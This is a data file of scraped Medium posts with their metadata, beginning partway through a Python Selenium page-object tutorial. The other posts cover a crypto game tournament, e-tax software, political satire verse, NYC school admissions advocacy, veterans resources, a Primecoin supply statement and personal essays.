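    def find_element(self, by, value):
        driver = self
        class _El:
            def send_keys(self, text):
                driver.events.append((value, text))
            def click(self):
                driver.events.append((value, "click"))
        return _El()

    def quit(self):
        self.events.append(("driver", "quit"))


class LoginPage:
    """Minimal inline page object (see LoginPage.py)."""
    USERNAME_FIELD = ("id", "username")
    PASSWORD_FIELD = ("id", "password")
    LOGIN_BUTTON = ("id", "login")

    def __init__(self, driver):
        self.driver = driver

    def login(self, username, password):
        self.driver.find_element(*self.USERNAME_FIELD).send_keys(username)
        self.driver.find_element(*self.PASSWORD_FIELD).send_keys(password)
        self.driver.find_element(*self.LOGIN_BUTTON).click()


class TestLogin(unittest.TestCase):
    def setUp(self):
        self.driver = _StubDriver()  # real code: webdriver.Chrome()

    def test_valid_login_reaches_home_page(self):
        LoginPage(self.driver).login("user@example.com", "secret")
        # verify we landed on the expected page after logging in
        self.assertEqual(self.driver.title, "Home Page")

    def tearDown(self):
        self.driver.quit()


if __name__ == "__main__":
    unittest.main()
```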
That’s all! You may wonder how to gather the login details. Here is where Data Driven Testing comes in: I encapsulated the login details in a login_details.xlsx file and used the pandas library to fetch the username and password as easily as possible with a minimal amount of code.
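The post itself reads the credentials with pandas (roughly pandas.read_excel("login_details.xlsx")); as a dependency-free illustration of the same data-driven idea, here is an equivalent loader using a CSV file and only the standard library (the file and column names are assumptions, not the article's exact code):

```python
import csv


def load_login_details(path):
    """Return a list of (username, password) pairs from a CSV file
    with 'username' and 'password' columns."""
    with open(path, newline="") as f:
        return [(row["username"], row["password"]) for row in csv.DictReader(f)]
```

Each returned pair can then feed a parametrized login test, keeping the test data out of the test code.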
4. Advantages
If the UI design of the page changes, you don’t have to update the test class implementation; it is enough to update the page object (locator).
POM lets us create non-fragile tests by reducing duplicated code.
POM keeps our test code as clean as possible, so the tests are easy to understand even a very long time later.
The POM design separates the page objects and the tests, achieving an abstraction.
Let’s continue with the next blog. See you there! | https://medium.com/@alipala/4-page-object-model-pattern-6167dc0b5351 | ['Ali Pala'] | 2019-10-27 20:39:57.407000+00:00 | ['Selenium', 'Test Automation', 'Page Object Model', 'Python', 'Selenium Webdriver'] |
EOS Knights holds the 1st EK. Cup! | The 1st EK. Cup — EOS Knights
When does the 1st EK. Cup start?
From Tuesday, April 23rd at 12:00(UTC) — To Friday, April 26th until 12:00(UTC); 3 days
Where will this event be held?
You will be teleported using the EK. Cup Portal. Please refer to the image below
Whom to play with?
With your 10 times stronger Knights ERIC, ORIA and SCARLLET
How to participate?
Every player starts the EK. Cup under the same conditions
What is the goal of EK. Cup?
Reach the highest floor and craft ‘The Great Sword Against Death’
Reward to be claimed
50 EOS: the first account who successfully crafts and submit ‘The Great Sword Against Death’
10 EOS: Top 20 accounts who reach the highest floor
MW: Every participant get MW, based on number of floors they climb (1,000 MW is max reward)
Miscellaneous
- A level 1 Knight each of ERIC, ORIA and SCARLLET will be provided at the start
- 9,000 Dark Magic Water (DMW) will also be given at the beginning. DMW can be used for the EK. Cup only!
- During the event the attack of all Knights will be 10X stronger than usual
- Certain items require 4 materials. 1 out of these 4 materials can be replaced by DMW
- There is no material/item market on the event.
Attention
All materials, items, pets and DMW used during the cup will be destroyed! | https://medium.com/eosys/eos-knights-hold-the-1st-ek-cup-d2722b7fd4f4 | [] | 2019-04-18 05:34:51.160000+00:00 | ['Eos', 'En', 'Eosio', 'Eosknights', 'Game'] |
E-Tax Solutions: #taxes2020 #taxes | e-Tax Invoice / e-Receipt
What is ETAX ?
Since 2012, the Thai Revenue Department (“RD”) has had a policy of supporting the preparation and delivery of electronic tax invoices (“e-tax invoices”) or electronic receipts (“e-receipts”) to support electronic transactions in the private sector and to increase the efficiency of electronic services (“e-services”) of the government.
How to submit ETAX invoice to RD ?
There are rules, procedures, and conditions specified in the RD regulations. Briefly, e-tax invoices and e-receipts are issued with a digital signature as an XML file that meets the RD’s criteria (files that do not meet them will be rejected) and must be submitted to the RD by uploading the XML files on the RD website. Normally the documents that the RD receives are as follows: Tax Invoice, Receipt, Credit Note (issued to decrease the debt), and Debit Note (issued to increase the debt).
E-Tax by CODIUM provides a time-saving automation solution for submitting taxes to the Thai Department of Revenue via email. Several companies are already using this software and have shown that it can be integrated seamlessly with SAP Business One (as well as other) accounting software. The software can automatically submit all of the correct documents to the Department of Revenue every month via email.
Our current E-Tax customers include: Huawei, SB-furniture, Siam@Siam, Homepro, DV, Dplus, BNG, Thai Samsung, BCH, PVP, SCB-BCM, Thai Insurance, Chodthanawat, Foodie, Ruamwattana, Piyamata, Eastern Sugar & Cane, Sakon Sathapat, JD Central, T2P, IQVIA, VS Chem, L.P.N. Development, Petronas, Kemrex, Wealth On Wellness, Gojek, Thai Reinsurance, Pezy Online.
#accounting #automation #automation #software #business #sap #development #webapplication #webappdevelopment #applicationservices #taxhelp #taxexpert | https://medium.com/c0d1um/e-tax-solutions-taxes2020-taxes-8a9d07e6d886 | ['Siwanad W'] | 2020-12-25 02:59:05.251000+00:00 | ['Accounting Software', 'Etax Services Inc', 'Accounting Services', 'Taxes', 'E Tax Invoice'] |
“A VISIT FROM SANITY CLAUSE” | ’Twas the night before Christmas and in the White House
not a creature was stirring, except for The Louse.
He sat on his gold throne, device on his knees,
Tweeting his latest insanities.
Then, from somewhere outside there arose such a clatter,
that he jumped from his duties and dropped his snack platter.
To the window he waddled and looked down to see
a red-suited figure — “Who could that be?”
Then Junior crawled in whining: “What’s all that noise?”
as Barron shrieked: “Santa! He’s bringing my toys!”
“Oh no, THAT’S not Santa! Are you dumb or just blind?
That’s old Crooked Hillary and her saggy behind!”
From her sleigh in the driveway then Hillary spoke:
“I’ve got the computers and pictures and notes,
and even the boxes of uncounted votes!
I saw you do all of the sick things you did,
and I know where you’re hiding the secrets you hid.
With the blackmail items that, for years, you’ve stocked up,
when it’s all sorted out, won’t be me who’s locked up!
Your time in the White House will soon be no more
and I’ll laugh and applaud as you’re dragged out the door!”
Then Eric unleashed such a sad, mournful sob:
“If Dad’s not The Boss, who will give me a job?”
“Shut up. Just shut up! This is not about YOU!
This is all about ME, but I know what to do!
I’ve got friends, lots of friends, the BEST friends, in fact.
They love me, they’re loyal, they won’t let me get sacked!
I have friends in high places — friends nobody knows,
friends with yuge power and yuge debts they owe!
I’m too big to fail — too powerful to touch!
I’ll be President for life — they promised that much!”
Then the pants-suited figure stood tall, straight and proud
And from out on the driveway her laughter got loud:
“President for life? — Too big to fail?
With titles like that you’ll be well-liked in jail!
With your selfish, disgusting, deplorable deeds,
and your cruelty, lies and insatiable greed,
you’ve written your future in blood on the streets,
and set it in stone with your 3 AM Tweets!
You’re a cancer — a rancid and festering sore –
a malignant, malicious, international whore!
The time has now come that the Piper be paid.
Time now that the sum of your Evil be weighed.
I thank Flynn, Giuliani, Manaforte and Ted Cruz,
and Cohen and all of your ‘Friends’ at Fox News!”
Then, reins in her hands, she hopped back on her sleigh
and uttered the words she had long wished to say:
“Great thanks to the People who dared ‘take a knee’,
and to Dreamers and Memers who refused not to see,
plus the millions of people with Soul and with Heart
who wept as you ripped this whole Nation apart.
Thanks to Mueller, Pelosi, Adam Schiff and Max Waters
and all of America’s sensible voters,
our Nightmare is over — we’re rid of that Scum
and the soulless bloodsuckers who were loyal to the Bum!”
Then she said, with a wave and a glorious grin:
“Merry Christmas to all — may the Healing begin!”
— Y.Not?! (aka Brooke Jones) | https://medium.com/@WhatifYNot/a-visit-from-hillary-clause-2c9aafe1f43c | ['Brookejones', 'Aka', 'Y.Not'] | 2019-12-05 20:34:27.967000+00:00 | ['Christmas', 'Hillary Clinton', 'Satire', 'Political Satire', 'Politics'] |
A Missed Opportunity to Plan For Equity: A Response to High School and Middle School Admissions… | A Missed Opportunity to Plan For Equity: A Response to High School and Middle School Admissions Changes in NYC
PRESS NYC affirms eliminating middle school admissions screens and demands more visionary solutions moving forward.
PRESS NYC, Parents for Responsive, Equitable, Safe Schools, is a parent collective who hold the education press and the NYC mayor accountable. We lead on CECs, build learning communities with students, write anti-racist curriculum, have expertise in the challenges of navigating the system for students with disabilities, and demand that parents are able to engage with the DOE in their language. We expect the DOE to be responsive to the communities it serves, centered on equity, & grounded in health & safety.
The Department of Education has announced that:
for the upcoming school year, and possibly beyond, all middle school admissions screens will be eliminated.
all geographic priority in high school admissions will be eliminated, including in District 2.
individual high schools will be allowed to maintain their screening policies, using grades from 6th and the beginning of 7th grades.
Thus far, no information has been released regarding admissions testing for Gifted & Talented.
In response, PRESS NYC:
supports the DOE’s elimination of screens for middle school admission for the current admissions cycle, and advocates for ending them permanently.
urges the DOE to adopt an admissions model similar to D15, pegged to district averages of students living in poverty. Or to use a transparent parent friendly algorithm like the one put forward in District 1.
applauds removing geographic priority for high school admission as a small step toward equitable enrollment, but recognizes that this action alone will not accomplish equitable enrollment.
urges the DOE to consider an admissions mechanism that will create diverse student populations in each high school (intentionally building upon the Ed-Opt method).
urges the DOE to suspend G&T testing and the SHSAT because there is no equitable way to administer tests for G&T or SHSAT without jeopardizing health and safety of our students and educators, and given that students and families have been dealing with pandemic circumstances beyond their control that have barred them from an equitable education.
“The admissions plan as announced can only achieve the goals of equitable, integrated, culturally responsive and sustaining schools if followed by subsequent announcements of policies that enable these changes to succeed.” — Yuli Hsu, 1st VP Community Education Council 14, Member of PRESS NYC
“More diverse schools on paper, which might be the result of these admissions changes, may not equal more diverse classrooms if de-tracking is not a focus. Unless each school has a diversity equity and inclusion committee of some kind, there will be no collaborative body working to bring these ideas alive in the school. Parents might have new opportunities to apply to schools that might be a great match for their children or adolescents but they might not get the support they need to learn about these schools.” — Naomi Peña, President of Community Education Council 1, member of PRESS NYC
“School communities often make up for the lack of vision and planning in plans like the ones being unveiled today, but we want a whole school system that creates the conditions for student centered, humanity driven anti racist practices in every classroom, across all grades. What we often see when seemingly revolutionary policy is handed down is how privileged swaths of parents and eager to please administrators are able to find loopholes in the language and practice of policy that continues to uphold the status quo. We won’t allow for this to be heralded as a success when the SHSAT is still being administered and G&T remains intact despite the pandemic proving once again that New York City’s children remain separate and unequal.” — Tajh Sutton, President Community Education Council 14, member of PRESS NYC
“The pandemic is forcing changes that de Blasio should have made on day 1. Now that they are beginning to be made, will there be the needed social emotional supports, like advisories, once they are in these schools? Will there be professional development in differentiation? Will they make sure all parents can access virtual tours in their languages?” — Liz Rosenberg, member of PRESS NYC, District 15 parent.
“Standardized tests, including the test for the G&T and SHSAT, are only a measure of access and privilege. It perpetuates segregation and a caste system in our schools. It would be irresponsible to just lift screens without putting in place priority measures for marginalized and minoritized students. These policies need to be centered on racial justice, not just because of COVID19, but because our students deserve integrated, fully funded, equitable schools.” — Kaliris Y. Salas-Ramirez, PhD, president of Community Education Council 4, member of PRESS NYC
Eliminating Middle School Admissions Screens
PRESS NYC applauds the NYC Department of Education for the long-overdue elimination of screens for middle school admission for the current cycle, and we advocate for making this policy change permanent. This is a first step toward a more equitable middle school admissions process. It has always been unjustifiable to base admissions for ten-year-olds on criteria like grades, test scores, or attendance that are overdetermined by factors outside a child’s control, and given the impact of COVID-19, using such screens would be unconscionable.
We know that historically marginalized students have suffered most during the pandemic. Many have chosen fully remote learning due to health concerns. Too many still lack devices and reliable internet connections 9 months into pandemic schooling. Over a hundred thousand students are living in temporary housing. Many children live in fear of their caregivers getting sick or losing financial stability, and many have already experienced these realities. The DOE is on the right side of history in offering historically marginalized students equitable access to middle schools of their choice.
However, if this policy changes admissions only, it will fail. If the DOE is committed to creating diverse and integrated schools, they must enact an admissions process aligned with the process in District 15: every middle school should have a student population that reflects its district. We urge the DOE to implement and improve upon the District 15 process citywide, using the district averages for students living in poverty, with an eventual eye to adjusting district lines to ensure equity citywide.
Removing District Priority in High School Admissions
We applaud the DOE for removing geographic priority, as recommended by the School Diversity Advisory Group. For too long, district priority in admissions has enabled opportunity hoarding and has fueled school segregation.
However, simply removing geographic priorities, especially D2, will not automatically result in equitable access for historically marginalized students, nor will it ensure culturally responsive or sustaining learning environments for all students. Although the removal of screens creates opportunities for increased access, especially for low-income students and students of color, it does not guarantee integration. In order to realize our vision of equitable, integrated, culturally responsive and sustaining schools, we must interrupt systemic, wide-ranging patterns and implement mechanisms (building on Ed-Opt) that intentionally promote diversity and anti-racism, including the “5 R’s of Real Integration” developed by IntegrateNYC.
Removing this single geographic screen is an important first step, but expecting schools to desegregate themselves based on access alone has never proven effective. This must be accompanied by a commitment by the DOE to facilitate active outreach to all middle schools in order to ensure the high school applicant pool reflects the diversity of the city. And to make this desegregation effort sustainable, it must be accompanied by a commitment to create a culturally competent and representative school environment.
We are frustrated that the DOE has missed an opportunity for truly transformative change by failing to remove all academic screening for high schools, even as a temporary measure. The lack of valid metrics during the pandemic, when already-existing inequities were magnified, highlights the baselessness of screening policies in general. DOE’s own analysis from spring 2020 shows that 1 in 6 seventh graders perform at least one level worse on 6th grade tests. More disconcerting was their analysis showing both 4th graders and 7th graders perform worse on marking period grades than on final grades. Given these takeaways, we recommend removing academic screening for high schools at least for this admissions cycle.
Gifted & Talented
Research is clear: testing 4-year-olds is not meaningful. Nothing in either science or educational practices justifies this, and it is unsafe to conduct in-person testing during the COVID-19 pandemic. We demand that G&T testing be suspended for this year and that the city move toward a schoolwide enrichment model and Universal Design for Learning immediately.
SHSAT
Although the state controls the single-test admissions criterion for 3 of the city’s specialized high schools, we continue to demand an end to this egregiously inequitable policy, which the city could implement for the remaining SHS’s right away. “The existing system is championed by those who have figured out how to win at this game, with the rules as they are, and who are willing to say or do anything to protect the status quo, no matter the harm to children in all communities. We must reject this, and demand an equitable education for all of our children,” as we wrote in our recent opinion piece.
“We believe that every child — regardless of their parents’ admissions savvy, their test prep regimen, or any other factor — deserves high quality public schools, simply for being a young human to whom we owe our best. Instead of more “specialized” schools, let’s instead make every high school spectacular. Let’s provide the resources for deep, meaningful learning. Let’s do away with scarcity-by-design. All students deserve a public education that cultivates empathy, critical thinking, and cultural competency, and ensures young people become the community-oriented, engaged citizens needed for our democracy to flourish.”
We Continue to Demand:
Equity of Opportunity, Access, & Resources:
Unscreen our schools
Enact police-free schools
Focus resources where there is highest need
5 Rs of Real Integration:
Resources
Race & Enrollment
Relationships
Restorative Justice
Representation
Culturally Responsive & Sustaining, Healing-Centered, Liberatory Schools
Whose Quality Goes Beyond Reputation & Test Scores to Meaningful Criteria:
Teachers & Leadership
School Culture
Resources
Academic Learning
Community & Wellbeing
PRESS NYC media contact: Liz Rosenberg, parents.PRESS.nyc@gmail.com
We are part of a broad coalition of citywide organizations representing stakeholders in public education who recognize the importance of this long-overdue step toward removing discriminatory admissions screens, but will continue to push for resource equity, real integration, and more meaningful definitions of school quality. | https://medium.com/@safeschoolsny/a-missed-opportunity-to-plan-for-equity-a-response-to-high-school-and-middle-school-admissions-8ddfd5d9ea12 | ['Parents For Responsive Equitable Safe Schools'] | 2020-12-24 18:26:53.613000+00:00 | ['Equity', 'New York City', 'Shsat', 'Middle School Admissions', 'High School Admissions'] |
Help during Hardship — Veterans Resource Roundup | Texans are resilient, but we have never faced a challenge like COVID-19 before. Texans from the top of the Panhandle, across the plains of Texas and down to the Rio Grande Valley have been impacted by the invisible enemy. Based on the calls coming into our Veterans Service Call Center and emails, we’ve put together a list of several resources and information sources that can help you and your family during this difficult time.
The Texas Workforce Commission (TWC) wants to make it easier for Veterans and other Texans to file for unemployment. TWC expanded its tele-center hours to seven days a week from 7 a.m. until 7 p.m. There’s more information on www.twc.texas.gov.
Governor Abbott announced April 21 that the state’s powerful online job matching and workforce services system — www.workintexas.com — had almost 500,000 job openings. Jobs can be found by area, skill, or employer.
On April 20, the Texas Veterans Commission (TVC) approved an additional $880,788 in emergency grant funding from the Fund for Veterans Assistance (FVA) to 16 organizations across the state, including the Salvation Army. The funds are to assist with increased service demands because of the Covid-19 outbreak. Information on grant recipients can be found by region.
Veteran-owned small business owners impacted by Covid-19 can get more information about helpful resources from the TVC’s April 10 press release.
On March 31, General Land Office Commissioner and VLB Chairman George P. Bush announced temporary relief to Veterans with VLB loans due to the Covid-19 outbreak. A temporary moratorium was issued on credit reporting, evictions, foreclosures, and late payment penalties as outlined by the VA, FHA, Fannie Mae, and Freddie Mac.
TexVet is the state’s clearinghouse for trusted information, resources, and helpful information for service members, Veterans, and their families. The site has contact information for multiple organizations that provide help such as emergency funds, food, and legal services.
Another website for Veterans needing help or support is the Texas Veterans Portal. It’s an offshoot of the state’s one-stop-shop of online information for Texans — www.texas.gov.
There are more than 200 County Veteran Service Offices in Texas. They provide assistance with local, state, and federal Veterans benefits.
The U.S. Department of Veterans Affairs provides health care and has additional information about Covid-19 on their site. | https://medium.com/texas-veterans-blog/help-during-hardship-veterans-resource-roundup-ef1f709a97a8 | ['Texas Vlb'] | 2020-04-27 19:55:34.992000+00:00 | ['Hardship Assistance', 'Covid 19', 'Veterans', 'Texas'] |
A Statement on the Circulating Supply of Primecoin | Dear Community,
We have heard your requests for a confirmed circulating supply of Primecoin and have been working hard to provide an answer. The complicating factors we faced were: (1) Primecoin’s relative nonuse; and (2) The Cryptsy hack. In the interest of full transparency we are providing both our answer and the work we have done to try to confirm this. We hope you find these satisfactory.
The Short Answer
The short answer is that the CoinMarketCap circulation of ~23 million is correct. While the primecoin.io site displayed a 4 million circulating supply, that website has not been updated in years and had not kept up with current supply.
We also are not able to burn any coins at this time. The Cryptsy exchange held a significant number of Primecoins and was “hacked” a few years ago. By hacked we mean the CEO, Paul Vernon, absconded to China with stolen cryptocurrencies worth millions. We hoped to trace those stolen coins and burn them as they were illicitly acquired. Unfortunately it appears those coins made their way back to circulation as detailed below.
Why Did It Take Us So Long?
For the circulating supply we, of course, saw that the wallet was showing 23 million circulating coins. But to make sure, our developers compiled an accurate sample of the Primecoin blockchain, recording the block reward for every tenth block. Extrapolating this data, assuming an even distribution of the change between each sample, we found the results were very similar to the number found on CoinMarketCap and the wallet’s readout. With this triple confirmation we are confident that 23 million is the correct supply. But we wanted to do more.
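The statement does not include the sampling script, but the described method (record the block reward at every tenth block, then assume an even change between consecutive samples) can be sketched as follows; this is a hypothetical reconstruction, not the team's actual code:

```python
def estimate_minted_supply(samples):
    """Estimate total coins minted from (height, block_reward) samples
    taken at regular block intervals, assuming the reward varies
    linearly between consecutive samples.

    samples: list of (block_height, reward) tuples sorted by height.
    """
    total = 0.0
    for (h0, r0), (h1, r1) in zip(samples, samples[1:]):
        n = h1 - h0                  # blocks covered by this interval
        total += n * (r0 + r1) / 2.0  # average reward times block count
    return total
```

Running such an estimator over samples pulled from a full node's RPC interface, and comparing the result against the wallet readout and CoinMarketCap, is the kind of triple check described above.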
While finding the supply was easy, we also wanted to find the coins from the Cryptsy hack to determine if any could be burned as illicit proceeds. Tracing coins hacked over two years ago is a difficult endeavor because of how many ways there are to “wash” funds. Our development team spent many hours on a blockchain analysis and started a full forensic examination. Given that we expected there would have been legal action, we also scoured legal archives, pored through court filings, and read hundreds of pages of records to try to find an answer. Luckily we found that a prior lawsuit against Cryptsy resulted in some useful information. A class action lawsuit against Cryptsy resulted in the appointment of a Receiver/Corporate Monitor whose task was to “determine the nature, location and value of all property interests of Cryptsy, including, but not limited to, cryptocurrencies . . .” and take possession of those assets.
We found several parts of his work helpful. As a result, given the excessive demands on our development team and the quality of the Receiver’s information, we decided it would not be worth duplicating his efforts any further. The court-ordered Receivership employed a “computer forensic team” with direct access to Cryptsy’s servers. This gave them a level of access we would not be able to replicate, the power to legally compel document production. They worked for several months with that power. Our analysis of the relevant portions of their findings are below.
Where Are Cryptsy’s Primecoins Now?
We found the Receiver “successfully accessed Cryptsy’s servers, made a backup of the wallets on them and [completed] the lengthy and tedious process of reviewing hundreds of wallets on the servers . . . [taking] several months.” While we found a list of seized coins Primecoin was not among them. At the end of his receivership the Receiver was legally bound to acquire as much value as possible for the plaintiff class. He did so by liquidating the high value coins on exchanges, which likely did not include Primecoin, and also by selling all remaining altcoins to private buyers. Primecoin did not appear on any of those sell lists. However, and unfortunately, the Receiver found that Vernon was able to sneak out certain funds including Primecoin and move them to foreign exchanges before the team could seize them. Those exchanges did not respond to U.S. court orders.
Given the combination of these two factors: (1) that all secured cryptocurrencies were listed in the Receiver’s reports and sell lists and; (2) that Vernon was able to move at least some of his Primecoin to foreign exchanges we concluded that there were likely no “frozen” or “lost” wallets with Primecoin still in them otherwise the Receiver would have found them. Rather, the fact that at least some were moved to foreign exchanges likely means Cryptsy’s Primecoins were sold and are now back in the circulating supply meaning we are unable to burn those coins. While our development team followed up on these leads, they were unable to find much more beyond what the Receiver’s team uncovered. We have emailed the Receiver but have not heard back. We will update the community if they respond and any promising leads result.
Final Note
Again, we want to assure you that we heard your requests for a confirmed circulating supply. We wanted to respond immediately to the many community members who asked, but we did not feel we should do so until we had exhausted every avenue. We hope you find this statement a satisfactory answer.
Going forward, we would like to ask you to trust us. When a team member says that we are working on something and it cannot be rushed, please have faith that it is because we are working exhaustively on the issue and prefer to release information only when we are wholly confident in its accuracy and thoroughness.
Sincerely,
The Bitcoin Prime Team | https://medium.com/btcprime/a-statement-on-the-circulating-supply-of-primecoin-bbaf01b40e32 | ['Prime Team'] | 2018-05-03 15:14:11.395000+00:00 | ['Cryptocurrency', 'Blockchain', 'Hacks', 'Bitcoin'] |
The motivational and talent utilizing world of Freelancing. | I had this storm of emotions inside, but clueless of how to deal with it for so long. I have been cut off from social media since 2012, the thought of it gave me nausea. I came across many unethical stuff which lead me to social distance myself from the digital society.
What changed?
Well, my disappearance surely had no effect, but since then social media has changed, and there are platforms that have much more to offer to the talented and skillful. Blogging and freelancing platforms have elegantly and efficiently carried the world to the next level. They discover talents and skill sets and get you paid for your services.
Evolved Passion.
Getting Paid for your Talent (Freelance).
Over the years, life inside the digital world has evolved to such an extent that the talented and skillful are even getting paid for their passion. This is surely the rise of a more promising future for the upcoming generations. Where you might otherwise simply be exploited for your work, that same work has become a blessing in the world of freelance. It does have a certain number of cons, but the pros are even more promising. It doesn't matter what skills you have; if you can offer them as a service, you will get paid for them.
So you can too
If I was able to change and step up for myself, doing what was my passion and what gave me a more thrilling and fun experience, then so can you. Discover yourself and decide today. Yes, it will take time; yes, it will require effort; but believe me, you'll reach a higher and more prosperous place in time. You'll learn more and grow more. So believe in your dreams and start pursuing them.
How to Submit to Write Like A Girl | What we look for
At Write Like A Girl, our overarching mission statement is to amplify and empower the voices and ideas of women through compelling stories. We love personal stories that resonate with readers, as well as pieces on everything from politics to poetry.
Above all, we write by this saying: “Every time a woman stands up for herself, she stands up for all women.”
Topics we focus on:
Feminism and women
Mental health
Culture, politics, and society
Equality
Life, love, and self
Gender-based violence
Fashion and style
Current events
As a rule of thumb, it’s best to take a look at our latest stories to see if your article would be a good fit. Here are some examples:
Keep in mind that you’re not limited to these topics. As long as it aligns with our themes, we’ll love it. | https://medium.com/write-like-a-girl/how-to-submit-to-write-like-a-girl-de6f3b56daa | ['Zoe Yu'] | 2020-12-08 20:51:37.987000+00:00 | ['Submission', 'Feminism', 'Equality', 'Culture', 'Politics'] |
art of a different kind (rupi kaur wannabe) | i’m a rupi kaur wannabe
guess i’m her but with different traumas
i think she’s really cool
and sorry if my poetry sounds like her
i don’t expect anyone to see these
but i’m finding my style
like i did with my drawings so long ago
this is art of a different kind
and i’m still learning | https://medium.com/@emufriend/art-of-a-different-kind-rupi-kaur-wannabe-a9d6d9005627 | [] | 2020-12-23 22:17:14.318000+00:00 | ['Poetry Writing', 'Poetry', 'Poem A Day', 'Poetry On Medium', 'Poems On Medium'] |